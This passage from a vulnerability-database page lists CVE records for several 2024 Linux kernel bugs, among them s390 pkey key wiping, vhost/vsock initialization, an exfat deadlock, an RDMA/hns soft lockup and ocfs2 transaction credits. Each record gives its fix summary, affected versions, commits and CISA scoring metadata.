"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "c746f7ced4ad88ee48d0b6c92710e4674403185b",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
},
{
"lessThan": "f2ebdadd85af4f4d0cae1e5d009c70eccc78c207",
"status": "affected",
"version": "e80d4af0a320972aac58e2004d0ba4e44ef4c5c7",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/s390/crypto/pkey_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.11"
},
{
"lessThan": "4.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.9",
"versionStartIncluding": "4.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ns390/pkey: Wipe copies of protected- and secure-keys\n\nAlthough the clear-key of neither protected- nor secure-keys is\naccessible, this key material should only be visible to the calling\nprocess. So wipe all copies of protected- or secure-keys from stack,\neven in case of an error."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:24:19.111Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/c746f7ced4ad88ee48d0b6c92710e4674403185b"
},
{
"url": "https://git.kernel.org/stable/c/f2ebdadd85af4f4d0cae1e5d009c70eccc78c207"
}
],
"title": "s390/pkey: Wipe copies of protected- and secure-keys",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42155",
"datePublished": "2024-07-30T07:46:57.729Z",
"dateReserved": "2024-07-29T15:50:41.194Z",
"dateUpdated": "2025-05-04T09:24:19.111Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43873 (GCVE-0-2024-43873)
Vulnerability from cvelistv5
Published
2024-08-21 00:06
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
vhost/vsock: always initialize seqpacket_allow
There are two issues around seqpacket_allow:
1. seqpacket_allow is not initialized when socket is
created. Thus if features are never set, it will be
read uninitialized.
2. if VIRTIO_VSOCK_F_SEQPACKET is set and then cleared,
then seqpacket_allow will not be cleared appropriately
(existing apps I know about don't usually do this but
it's legal and there's no way to be sure no one relies
on this).
To fix:
- initialize seqpacket_allow after allocation
- set it unconditionally in set_features
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43873",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:13.431243Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:18.350Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/vhost/vsock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "ea558f10fb05a6503c6e655a1b7d81fdf8e5924c",
"status": "affected",
"version": "ced7b713711fdd8f99d8d04dc53451441d194c60",
"versionType": "git"
},
{
"lessThan": "3062cb100787a9ddf45de30004b962035cd497fb",
"status": "affected",
"version": "ced7b713711fdd8f99d8d04dc53451441d194c60",
"versionType": "git"
},
{
"lessThan": "30bd4593669443ac58515e23557dc8cef70d8582",
"status": "affected",
"version": "ced7b713711fdd8f99d8d04dc53451441d194c60",
"versionType": "git"
},
{
"lessThan": "eab96e8716cbfc2834b54f71cc9501ad4eec963b",
"status": "affected",
"version": "ced7b713711fdd8f99d8d04dc53451441d194c60",
"versionType": "git"
},
{
"lessThan": "1e1fdcbdde3b7663e5d8faeb2245b9b151417d22",
"status": "affected",
"version": "ced7b713711fdd8f99d8d04dc53451441d194c60",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/vhost/vsock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.14"
},
{
"lessThan": "5.14",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.14",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.14",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nvhost/vsock: always initialize seqpacket_allow\n\nThere are two issues around seqpacket_allow:\n1. seqpacket_allow is not initialized when socket is\n created. Thus if features are never set, it will be\n read uninitialized.\n2. if VIRTIO_VSOCK_F_SEQPACKET is set and then cleared,\n then seqpacket_allow will not be cleared appropriately\n (existing apps I know about don\u0027t usually do this but\n it\u0027s legal and there\u0027s no way to be sure no one relies\n on this).\n\nTo fix:\n\t- initialize seqpacket_allow after allocation\n\t- set it unconditionally in set_features"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:16.975Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/ea558f10fb05a6503c6e655a1b7d81fdf8e5924c"
},
{
"url": "https://git.kernel.org/stable/c/3062cb100787a9ddf45de30004b962035cd497fb"
},
{
"url": "https://git.kernel.org/stable/c/30bd4593669443ac58515e23557dc8cef70d8582"
},
{
"url": "https://git.kernel.org/stable/c/eab96e8716cbfc2834b54f71cc9501ad4eec963b"
},
{
"url": "https://git.kernel.org/stable/c/1e1fdcbdde3b7663e5d8faeb2245b9b151417d22"
}
],
"title": "vhost/vsock: always initialize seqpacket_allow",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43873",
"datePublished": "2024-08-21T00:06:25.114Z",
"dateReserved": "2024-08-17T09:11:59.281Z",
"dateUpdated": "2025-05-04T09:28:16.975Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42315 (GCVE-0-2024-42315)
Vulnerability from cvelistv5
Published
2024-08-17 09:09
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
exfat: fix potential deadlock on __exfat_get_dentry_set
When accessing a file with more entries than ES_MAX_ENTRY_NUM, the bh-array
is allocated in __exfat_get_entry_set. The problem is that the bh-array is
allocated with GFP_KERNEL. It does not make sense. In the following cases,
a deadlock for sbi->s_lock between the two processes may occur.
CPU0 CPU1
---- ----
kswapd
balance_pgdat
lock(fs_reclaim)
exfat_iterate
lock(&sbi->s_lock)
exfat_readdir
exfat_get_uniname_from_ext_entry
exfat_get_dentry_set
__exfat_get_dentry_set
kmalloc_array
...
lock(fs_reclaim)
...
evict
exfat_evict_inode
lock(&sbi->s_lock)
To fix this, let's allocate bh-array with GFP_NOFS.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bd3bdb9e0d656f760b11d0c638d35d7f7068144d Version: 92dcd7d6c6068bf4fd35a6f64d606e27d634807e Version: d8fe01ad2d8ab33aaf8f2efad9e8f1dae11c4b0c Version: a3ff29a95fde16906304455aa8c0bd84eb770258 Version: a3ff29a95fde16906304455aa8c0bd84eb770258 Version: a3ff29a95fde16906304455aa8c0bd84eb770258 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42315",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:45.977516Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:26.638Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/exfat/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "632fb232b6bbf8277edcbe9ecd4b4d98ecb122eb",
"status": "affected",
"version": "bd3bdb9e0d656f760b11d0c638d35d7f7068144d",
"versionType": "git"
},
{
"lessThan": "c052f775ee6ccacd3c97e4cf41a2a657e63d4259",
"status": "affected",
"version": "92dcd7d6c6068bf4fd35a6f64d606e27d634807e",
"versionType": "git"
},
{
"lessThan": "cd1c7858641384191ff7033fb1fc65dfcd559c6f",
"status": "affected",
"version": "d8fe01ad2d8ab33aaf8f2efad9e8f1dae11c4b0c",
"versionType": "git"
},
{
"lessThan": "a7ac198f8dba791e3144c4da48a5a9b95773ee4b",
"status": "affected",
"version": "a3ff29a95fde16906304455aa8c0bd84eb770258",
"versionType": "git"
},
{
"lessThan": "1d1970493c289e3f44b9ec847ed26a5dbdf56a62",
"status": "affected",
"version": "a3ff29a95fde16906304455aa8c0bd84eb770258",
"versionType": "git"
},
{
"lessThan": "89fc548767a2155231128cb98726d6d2ea1256c9",
"status": "affected",
"version": "a3ff29a95fde16906304455aa8c0bd84eb770258",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/exfat/dir.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.2"
},
{
"lessThan": "6.2",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.232",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.175",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.232",
"versionStartIncluding": "5.10.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.175",
"versionStartIncluding": "5.15.150",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nexfat: fix potential deadlock on __exfat_get_dentry_set\n\nWhen accessing a file with more entries than ES_MAX_ENTRY_NUM, the bh-array\nis allocated in __exfat_get_entry_set. The problem is that the bh-array is\nallocated with GFP_KERNEL. It does not make sense. In the following cases,\na deadlock for sbi-\u003es_lock between the two processes may occur.\n\n CPU0 CPU1\n ---- ----\n kswapd\n balance_pgdat\n lock(fs_reclaim)\n exfat_iterate\n lock(\u0026sbi-\u003es_lock)\n exfat_readdir\n exfat_get_uniname_from_ext_entry\n exfat_get_dentry_set\n __exfat_get_dentry_set\n kmalloc_array\n ...\n lock(fs_reclaim)\n ...\n evict\n exfat_evict_inode\n lock(\u0026sbi-\u003es_lock)\n\nTo fix this, let\u0027s allocate bh-array with GFP_NOFS."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:35.431Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/632fb232b6bbf8277edcbe9ecd4b4d98ecb122eb"
},
{
"url": "https://git.kernel.org/stable/c/c052f775ee6ccacd3c97e4cf41a2a657e63d4259"
},
{
"url": "https://git.kernel.org/stable/c/cd1c7858641384191ff7033fb1fc65dfcd559c6f"
},
{
"url": "https://git.kernel.org/stable/c/a7ac198f8dba791e3144c4da48a5a9b95773ee4b"
},
{
"url": "https://git.kernel.org/stable/c/1d1970493c289e3f44b9ec847ed26a5dbdf56a62"
},
{
"url": "https://git.kernel.org/stable/c/89fc548767a2155231128cb98726d6d2ea1256c9"
}
],
"title": "exfat: fix potential deadlock on __exfat_get_dentry_set",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42315",
"datePublished": "2024-08-17T09:09:23.779Z",
"dateReserved": "2024-07-30T07:40:12.278Z",
"dateUpdated": "2025-05-04T09:26:35.431Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43872 (GCVE-0-2024-43872)
Vulnerability from cvelistv5
Published
2024-08-21 00:06
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/hns: Fix soft lockup under heavy CEQE load
CEQEs are handled in interrupt handler currently. This may cause the
CPU core staying in interrupt context too long and lead to soft lockup
under heavy load.
Handle CEQEs in BH workqueue and set an upper limit for the number of
CEQE handled by a single call of work handler.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43872",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:06:16.645858Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:18.467Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hns/hns_roce_device.h",
"drivers/infiniband/hw/hns/hns_roce_hw_v2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "06580b33c183c9f98e2a2ca96a86137179032c08",
"status": "affected",
"version": "a5073d6054f75d7c94b3354206eec4b804d2fbd4",
"versionType": "git"
},
{
"lessThan": "2fdf34038369c0a27811e7b4680662a14ada1d6b",
"status": "affected",
"version": "a5073d6054f75d7c94b3354206eec4b804d2fbd4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/hw/hns/hns_roce_device.h",
"drivers/infiniband/hw/hns/hns_roce_hw_v2.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.16"
},
{
"lessThan": "4.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "4.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "4.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/hns: Fix soft lockup under heavy CEQE load\n\nCEQEs are handled in interrupt handler currently. This may cause the\nCPU core staying in interrupt context too long and lead to soft lockup\nunder heavy load.\n\nHandle CEQEs in BH workqueue and set an upper limit for the number of\nCEQE handled by a single call of work handler."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:28:15.395Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/06580b33c183c9f98e2a2ca96a86137179032c08"
},
{
"url": "https://git.kernel.org/stable/c/2fdf34038369c0a27811e7b4680662a14ada1d6b"
}
],
"title": "RDMA/hns: Fix soft lockup under heavy CEQE load",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43872",
"datePublished": "2024-08-21T00:06:24.041Z",
"dateReserved": "2024-08-17T09:11:59.281Z",
"dateUpdated": "2025-05-04T09:28:15.395Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42077 (GCVE-0-2024-42077)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ocfs2: fix DIO failure due to insufficient transaction credits
The code in ocfs2_dio_end_io_write() estimates number of necessary
transaction credits using ocfs2_calc_extend_credits(). This however does
not take into account that the IO could be arbitrarily large and can
contain arbitrary number of extents.
Extent tree manipulations do often extend the current transaction but not
in all of the cases. For example if we have only single block extents in
the tree, ocfs2_mark_extent_written() will end up calling
ocfs2_replace_extent_rec() all the time and we will never extend the
current transaction and eventually exhaust all the transaction credits if
the IO contains many single block extents. Once that happens a
WARN_ON(jbd2_handle_buffer_credits(handle) <= 0) is triggered in
jbd2_journal_dirty_metadata() and subsequently OCFS2 aborts in response to
this error. This was actually triggered by one of our customers on a
heavily fragmented OCFS2 filesystem.
To fix the issue make sure the transaction always has enough credits for
one extent insert before each call of ocfs2_mark_extent_written().
Heming Zhao said:
------
PANIC: "Kernel panic - not syncing: OCFS2: (device dm-1): panic forced after error"
PID: xxx TASK: xxxx CPU: 5 COMMAND: "SubmitThread-CA"
#0 machine_kexec at ffffffff8c069932
#1 __crash_kexec at ffffffff8c1338fa
#2 panic at ffffffff8c1d69b9
#3 ocfs2_handle_error at ffffffffc0c86c0c [ocfs2]
#4 __ocfs2_abort at ffffffffc0c88387 [ocfs2]
#5 ocfs2_journal_dirty at ffffffffc0c51e98 [ocfs2]
#6 ocfs2_split_extent at ffffffffc0c27ea3 [ocfs2]
#7 ocfs2_change_extent_flag at ffffffffc0c28053 [ocfs2]
#8 ocfs2_mark_extent_written at ffffffffc0c28347 [ocfs2]
#9 ocfs2_dio_end_io_write at ffffffffc0c2bef9 [ocfs2]
#10 ocfs2_dio_end_io at ffffffffc0c2c0f5 [ocfs2]
#11 dio_complete at ffffffff8c2b9fa7
#12 do_blockdev_direct_IO at ffffffff8c2bc09f
#13 ocfs2_direct_IO at ffffffffc0c2b653 [ocfs2]
#14 generic_file_direct_write at ffffffff8c1dcf14
#15 __generic_file_write_iter at ffffffff8c1dd07b
#16 ocfs2_file_write_iter at ffffffffc0c49f1f [ocfs2]
#17 aio_write at ffffffff8c2cc72e
#18 kmem_cache_alloc at ffffffff8c248dde
#19 do_io_submit at ffffffff8c2ccada
#20 do_syscall_64 at ffffffff8c004984
#21 entry_SYSCALL_64_after_hwframe at ffffffff8c8000ba
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c15471f79506830f80eca0e7fe09b8213953ab5f Version: c15471f79506830f80eca0e7fe09b8213953ab5f Version: c15471f79506830f80eca0e7fe09b8213953ab5f Version: c15471f79506830f80eca0e7fe09b8213953ab5f Version: c15471f79506830f80eca0e7fe09b8213953ab5f Version: c15471f79506830f80eca0e7fe09b8213953ab5f |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.199Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/a68b896aa56e435506453ec8835bc991ec3ae687"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/320273b5649bbcee87f9e65343077189699d2a7a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ea2d1c6789722d58ec191f14f9a02518d55b6b4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c05ffb693bfb42a48ef3ee88a55b57392984e111"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/331d1079d58206ff7dc5518185f800b412f89bc6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/be346c1a6eeb49d8fda827d2a9522124c2f72f36"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42077",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:23.681677Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:57.349Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/aops.c",
"fs/ocfs2/journal.c",
"fs/ocfs2/journal.h",
"fs/ocfs2/ocfs2_trace.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "a68b896aa56e435506453ec8835bc991ec3ae687",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
},
{
"lessThan": "320273b5649bbcee87f9e65343077189699d2a7a",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
},
{
"lessThan": "9ea2d1c6789722d58ec191f14f9a02518d55b6b4",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
},
{
"lessThan": "c05ffb693bfb42a48ef3ee88a55b57392984e111",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
},
{
"lessThan": "331d1079d58206ff7dc5518185f800b412f89bc6",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
},
{
"lessThan": "be346c1a6eeb49d8fda827d2a9522124c2f72f36",
"status": "affected",
"version": "c15471f79506830f80eca0e7fe09b8213953ab5f",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ocfs2/aops.c",
"fs/ocfs2/journal.c",
"fs/ocfs2/journal.h",
"fs/ocfs2/ocfs2_trace.h"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.6"
},
{
"lessThan": "4.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.221",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.221",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"versionStartIncluding": "4.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "4.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
